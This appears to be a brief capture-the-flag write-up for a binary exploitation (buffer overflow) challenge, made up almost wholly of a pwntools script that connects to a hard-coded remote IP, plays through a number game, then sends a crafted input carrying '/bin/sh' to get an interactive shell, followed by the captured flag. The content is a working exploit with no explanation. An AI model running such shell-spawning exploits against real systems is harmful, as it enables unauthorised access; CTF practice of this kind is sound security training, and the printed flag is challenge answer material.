Tags: binary-exploitation bufferoverflow pwn
Rating:
```
from pwn import *
while True:
try:
nc = remote('109.233.57.95', 20202)
i = 1
while True:
s = nc.recv().decode()
print(s)
s = nc.recv().decode()
print(s)
if '(x y)?' in s:
nc.sendline('1 ' + str(i))
i += 1
else:
break
nc.sendline('3')
nc.sendlineafter('? ', '3 AAAAAAA/bin/sh\x00')
nc.sendline('flag')
nc.interactive()
break
except:
continue
```
data:image/s3,"s3://crabby-images/20ee6/20ee6fe33489c3ec88d41cec3b09cc142c4f4008" alt=""
```
spbctf{OxOxO_N0w_y0u_REALLY_h4ve_w0n}
```